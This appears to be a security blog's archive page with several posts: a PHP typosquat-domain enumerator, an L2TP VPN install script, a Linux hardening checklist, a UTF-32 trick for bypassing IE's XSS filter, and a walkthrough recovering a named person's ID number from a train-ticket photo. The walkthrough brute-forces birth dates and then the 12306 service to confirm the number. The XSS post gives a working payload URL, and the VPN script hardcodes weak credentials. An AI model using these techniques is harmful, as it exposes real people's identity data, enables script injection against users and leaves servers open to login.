Category archive: security

Tool: enumerating look-alike domain names in PHP

1. Requirement:
Suppose a site's domain is http://www.wangzhan.com. The tool should do the following:
Vary the first character of the domain:
http://www.aangzhan.com
……
zangzhan.com
Vary the second character of the domain:
http://www.wangzhan.com
……
wzngzhan.com
And so on, up to the last character of the domain.
2. Implementation:

<?php
// Usage: php enum.php www.wangzhan.com
// Takes a three-part host name, varies each character of the middle label
// through a-z, prints every candidate, and then prints the look-alike
// substitutions for that candidate.
if ($argc < 2) {
    fwrite(STDERR, "usage: php " . $argv[0] . " www.example.com\n");
    exit(1);
}
$str = $argv[1];
$website_arr = explode(".", $str);
if (count($website_arr) != 3) {
    fwrite(STDERR, "expected a host of the form www.name.tld\n");
    exit(1);
}
$website_name = $website_arr[1];
$website_length = strlen($website_name);

// Visually confusable substitutions: [regex, replacement]. Each pair is
// applied to the whole candidate host with preg_replace.
$key = array(
	array("/j/","l"),
	array("/l/","j"),
	array("/i/","j"),
	array("/j/","i"),
	array("/i/","1"),
	array("/1/","i"),
	array("/j/","1"),
	array("/1/","j"),
	array("/l/","i"),
	array("/i/","l"),
	array("/b/","lo"),
	array("/lo/","b"),
	array("/q/","9"),
	array("/9/","q"),
	array("/u/","v"),
	array("/v/","u"),
	array("/6/","b"),
	array("/b/","6"),
	array("/w/","vv"),
	array("/vv/","w"),
	array("/m/","nn"),
	array("/nn/","m"),
	array("/o/","0"),
	array("/0/","o"),
	array("/m/","n"),
	array("/n/","m"),
	array("/com/","com.cn"),
	array("/com/","cn"),
	array("/com/","net"),
	array("/com/","org"),
	array("/com/","tk"),
	array("/com/","pk"),
	array("/com/","cf"),
	array("/com/","cc"),
	array("/com/","tv"),
	array("/com/","pl"),
	array("/com/","im"),
	array("/cn/","com"),
	array("/cn/","com.cn"),
	array("/cn/","net"),
	array("/cn/","org"),
	array("/cn/","tk"),
	array("/cn/","pk"),
	array("/cn/","cf"),
	array("/cn/","cc"),
	array("/cn/","tv"),
	array("/cn/","pl"),
	array("/cn/","im"),
	array("/cn/","cn.com"),
	array("/cn/","cn.org"),
	array("/cn/","org.cn"),
	array("/cn/","net.cn"),
	array("/cn/","cn.net"),
	array("/www./","www-"),
	array("/www./","www"),
	array("/china/","chnina"),
	array("/abc/","abcd"),
	array("/bank/","bork"),
	array("/bank/","benk"),
	array("/bank/","bonk"),
	array("/bank/","bark"),
	array("/so/","sou"),
	array("/2/","z"),
	array("/z/","2"),
	array("/c/","2"),
	array("/c/","z"),
);

// Vary each character position of the middle label. substr() already yields
// an empty left part at position 0 and an empty right part at the last
// position, so no special cases are needed.
for ($j = 0; $j < $website_length; $j++) {
    dealstring(substr($website_name, 0, $j), substr($website_name, $j + 1), $website_arr, $key);
}

// Rebuild the host with every letter a-z at the varied position, print the
// candidate itself, then print its look-alike variants.
function dealstring($str_zuo, $str_you, $website_arr, $key) {
    for ($i = 97; $i < 123; $i++) {
        $host = $website_arr[0] . '.' . $str_zuo . chr($i) . $str_you . '.' . $website_arr[2];
        echo $host . "\r\n";
        findHost($host, $key);
    }
}

// Print each look-alike variant of $host that differs from $host itself.
function findHost($host, $key) {
    for ($i = 0; $i < sizeof($key); $i++) {
        $hostChange = preg_replace($key[$i][0], $key[$i][1], $host);
        if ($hostChange != $host) {
            echo $hostChange . "\r\n";
        }
    }
}
?>

The screenshot below shows the output:

Next, one can visit each generated site, check whether it is reachable, and then monitor whether its content is a phishing page.

One-click L2TP VPN install script

1. Ways to install an L2TP VPN
First: openswan + xl2tpd. After installing it I found that only Windows could connect; iOS could not connect to the VPN, so I was forced to use the second method.
Second: strongswan + xl2tpd. After installing it, both iOS and Windows connect successfully.
2. strongswan + xl2tpd one-click install script (tested on CentOS 6.5)

rpm -ivh http://download.fedoraproject.org/pub/epel/6/x86_64/epel-release-6-8.noarch.rpm
yum -y update
yum -y install strongswan
yum -y install xl2tpd
sed -i 's/net.ipv4.ip_forward = 0/net.ipv4.ip_forward = 1/g' /etc/sysctl.conf
sysctl -p
iptables -A INPUT -p udp --dport 500 -j ACCEPT # IKE
iptables -A INPUT -p udp --dport 4500 -j ACCEPT # NAT-T
iptables -A INPUT -p udp -m policy --dir in --pol ipsec -m udp --dport 1701 -j ACCEPT # only accept L2TP that arrives inside IPsec
iptables -t nat -A POSTROUTING -s 192.168.1.0/24 -o eth0 -j MASQUERADE
ip_addr=$(ifconfig | grep 'inet addr:' | grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}')
echo "conn %default
        ikelifetime=24h
        keylife=24h
        rekeymargin=30m
        keyingtries=1
        rekey=no

conn l2tp
        keyexchange=ikev1 # IKE version
        left=$ip_addr
        leftsubnet=0.0.0.0/0
        leftprotoport=17/1701 # L2TP UDP traffic
        authby=secret # PSK authentication
        leftfirewall=no # do not let strongSwan change the firewall
        right=%any # any IP
        rightprotoport=17/%any # UDP traffic from any port
        type=transport # IPsec transport mode
        auto=add">>/etc/strongswan/ipsec.conf
echo ': PSK "fuck_great_firewall"'>>/etc/strongswan/ipsec.secrets
# -i is required here; without it sed only prints and xl2tpd.conf is never changed
sed -i 's/\[global\].*$/&\nlisten-addr ='$ip_addr'/g' /etc/xl2tpd/xl2tpd.conf
sed -i 's/^mtu.*/mtu 1200/g' /etc/ppp/options.xl2tpd
sed -i 's/^mru.*/mru 1200/g' /etc/ppp/options.xl2tpd
echo 'login'>>/etc/ppp/options.xl2tpd
echo 'test * test123 *'>>/etc/ppp/chap-secrets
service strongswan start
service xl2tpd start
chkconfig strongswan on
chkconfig xl2tpd on

3. After installation, the connection details are:
Connection type: L2TP
VPN username: test
VPN password: test123
Pre-shared key: fuck_great_firewall

4. This post is for study and exchange only.

Linux security configuration checklist

1. Check system password length and strength

Check the system password length

cat /etc/login.defs

PASS_MIN_LEN=8 # minimum user password length of 8; larger is better

Check the system password strength

cat /etc/pam.d/system-auth
 
password required /lib/security/$ISA/pam_cracklib.so retry=3 minlen=9 dcredit=-1 ucredit=-1 lcredit=-1 ocredit=-1

From the pam_cracklib.so policy above, a user changing their password must use at least 9 characters, and the password must contain at least one uppercase letter, one lowercase letter, one digit and one special character.

2. Check the lockout time limit against password brute forcing

cat /etc/pam.d/system-auth

Add the following below the first line, i.e. under #%PAM-1.0:
auth required pam_tally2.so deny=3 unlock_time=600 even_deny_root root_unlock_time=1200

Parameter meanings:
even_deny_root: also apply the limit to root;

deny: the maximum number of consecutive failed logins for normal users and root; once exceeded, the account is locked

unlock_time: how many seconds after a normal user is locked before the account is unlocked;

root_unlock_time: how many seconds after root is locked before the account is unlocked;

3. Check system file permissions

ls -l /etc/passwd   # expected 644, 600 or 000
ls -l /etc/shadow   # expected 600 or 000
ls -l /etc/group    # expected 644, 600 or 000

4. Default access permissions for system users

cat /etc/login.defs   # check that umask is 027 or 077

5. Check whether logging is enabled

cat /var/log/messages
cat /var/log/secure

6. Check boot-time startup items

rc_local=$(find / -name rc.local)
if [ "$rc_local" ]
then
    find / -name rc.local | while read rc_filename
    do
        echo '[*]filename: '"$rc_filename"
        cat "$rc_filename"
        echo ''
    done
else
    echo '[x]Find rc_local not exists'
fi

7. Check scheduled tasks

crontab -l

8. Check which users have logged in

last | awk '{print $1}' | sort | uniq

9. Check successful logins

if [ -f /var/log/secure ]
then
    grep -i 'Accept' /var/log/secure | awk '{print $1" "$2" "$3" "$11}'
else
    echo '[x]/var/log/secure file not found'
fi
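Checks 1 to 4 of the list above, turned into shell functions that return pass/fail so they can be scripted rather than read by eye. This is an added example, not code from the original post; it assumes GNU stat and awk (Linux), and the login.defs and system-auth files it reads are constructed samples written to a temporary directory, not the real ones under /etc.

```shell
#!/bin/sh
# Added example: checks 1-4 of the checklist as pass/fail functions (GNU stat/awk assumed).

# Print the value of KEY from a login.defs-style file ("KEY value" or "KEY=value").
defs_value() {
    awk -F '[ \t=]+' -v k="$2" '$1 == k { v = $2 } END { if (v == "") exit 1; print v }' "$1"
}

# Print OPTION's value from the first uncommented PAM line that loads MODULE.
pam_opt() {
    awk -v m="$2" -v o="$3" 'BEGIN { p = o "=" }
        !/^#/ && index($0, m) { for (i = 1; i <= NF; i++)
            if (index($i, p) == 1) { print substr($i, length(p) + 1); f = 1; exit } }
        END { exit f ? 0 : 1 }' "$1"
}

# Pass when FILE's octal mode is one of the allowed values, e.g. check_mode /etc/shadow "600 000".
check_mode() {
    m=$(stat -c '%a' "$1" 2>/dev/null) || return 1
    m=$(printf '%03d' "$m")
    for ok in $2; do [ "$m" = "$ok" ] && return 0; done
    return 1
}

# check_policy LOGIN_DEFS SYSTEM_AUTH: PASS_MIN_LEN >= 8, cracklib minlen >= 9,
# pam_tally2 deny present, UMASK 027 or 077. Prints each failing item.
check_policy() {
    rc=0
    [ "$(defs_value "$1" PASS_MIN_LEN || echo 0)" -ge 8 ] || { echo "FAIL PASS_MIN_LEN"; rc=1; }
    [ "$(pam_opt "$2" pam_cracklib.so minlen || echo 0)" -ge 9 ] || { echo "FAIL minlen"; rc=1; }
    pam_opt "$2" pam_tally2.so deny >/dev/null || { echo "FAIL pam_tally2 deny"; rc=1; }
    case "$(defs_value "$1" UMASK)" in 027|077) ;; *) echo "FAIL UMASK"; rc=1 ;; esac
    return $rc
}

# Constructed sample configuration with one weak setting (UMASK 022), so the
# example runs offline without touching /etc.
make_sample() {
    mkdir -p "$1"
    printf 'PASS_MIN_LEN 8\nUMASK 022\n' > "$1/login.defs"
    printf '#%%PAM-1.0\nauth required pam_tally2.so deny=3 unlock_time=600\n' > "$1/system-auth"
    printf 'password required pam_cracklib.so retry=3 minlen=9 dcredit=-1\n' >> "$1/system-auth"
    touch "$1/shadow" && chmod 600 "$1/shadow"
}

d=${TMPDIR:-/tmp}/hardening-demo
make_sample "$d"
check_policy "$d/login.defs" "$d/system-auth" || echo "policy check failed with status $?"
```

Run against a real host by pointing check_policy at /etc/login.defs and /etc/pam.d/system-auth and check_mode at /etc/passwd, /etc/shadow and /etc/group with the expected modes from step 3.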

A brief look at UTF-32 encoding

Lately I have been collecting examples I never fully understood (I'm a beginner). The article at http://zone.wooyun.org/content/4448 describes using UTF-32 encoding to bypass Google's XSS filter and run JavaScript in IE versions below 9. Let's look at how the following characters are converted.
[0x00][0x00][0x22][0x00] -> ∀
[0x00][0x00][0x3C][0x00] -> 㰀
[0x00][0x00][0x3E][0x00] -> 㸀
From the article, UTF-32 uses 4 bytes per character.
%00%00%22%00 -> ∀ (the ∀ character is what %00%00%22%00 becomes when converted from UTF-32 to UTF-8). Now the example:

<meta charset="UTF-8">
<?php
$str = '%00%00%22%00';
$str = urldecode($str);                               // raw bytes 00 00 22 00
$str = mb_convert_encoding($str, "UTF-8", "UTF-32");  // read as UTF-32, re-encode as UTF-8
echo urlencode($str);
?>

Output after running: %E2%88%80, i.e. the ∀ character

We can then write a demo page: http://www.leesec.com/utf-32.php?charset=utf-32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80

<!DOCTYPE html>
<html>
<head><meta charset="utf-8"></head>
<body>
<input type="text" value="<?php echo mb_convert_encoding(htmlspecialchars($_GET['v']), $_GET['charset'], "UTF-8"); ?>">
</body>
</html>

Screenshot of the code running

Recovering the ID card number on a train ticket

First, I found someone else's train ticket photo on Baidu.

From the photo we can extract the following information:

Name: 梅勇
Sex: male (the three digits from the fourth-last to the second-last position are the sequence code; it is odd, so male)
(see http://www.cnblogs.com/xudong-bupt/p/3293838.html)
From: Xinzhou District, Wuhan (武汉市新洲区; the first six digits of the ID number encode the region)
(see http://www.stats.gov.cn/tjsj/tjbz/xzqhdm/200406/t20040607_38302.html)

ID number: 4201171988xxxx1638

With the above information, we can use the ID number check-digit algorithm to validate candidates and rule out invalid ones.
(see http://www.cnblogs.com/xudong-bupt/p/3293838.html)

I implemented the validation in JS; the code is as follows:

var sfz_qian = "4201171988"; // known prefix: region code + birth year
var sfz_hou4 = "1638";       // known suffix: sequence code + check digit
var sfzhm = "";

// Pad a month or day number to two digits.
function pad2(n) {
  return n < 10 ? "0" + n : "" + n;
}

for (var i = 1; i <= 12; i++) {
  // For simplicity, assume every month has 31 days
  for (var j = 1; j <= 31; j++) {
    sfzhm = sfz_qian + pad2(i) + pad2(j) + sfz_hou4;
    var result = getvalidcode(sfzhm);
    if (result !== false) {
      console.log(result);
    }
  }
}

// Verify the check digit (18th character) of an 18-digit ID number using the
// weighted-sum mod 11 scheme; return the number if valid, otherwise false.
function getvalidcode(sfzhm_new) {
  var sum = 0;
  var weight = [7, 9, 10, 5, 8, 4, 2, 1, 6, 3, 7, 9, 10, 5, 8, 4, 2];
  var validate = ['1', '0', 'X', '9', '8', '7', '6', '5', '4', '3', '2'];
  for (var m = 0; m < sfzhm_new.length - 1; m++) {
    sum += sfzhm_new[m] * weight[m];
  }
  var mode = sum % 11;
  if (sfzhm_new[17] == validate[mode]) {
    return sfzhm_new;
  } else {
    return false;
  }
}

The output of the code is as follows:

Then we export the 35 records as a dictionary, take them to 12306 and brute-force adding them as frequent contacts, and finally we obtain the ID number on the photo.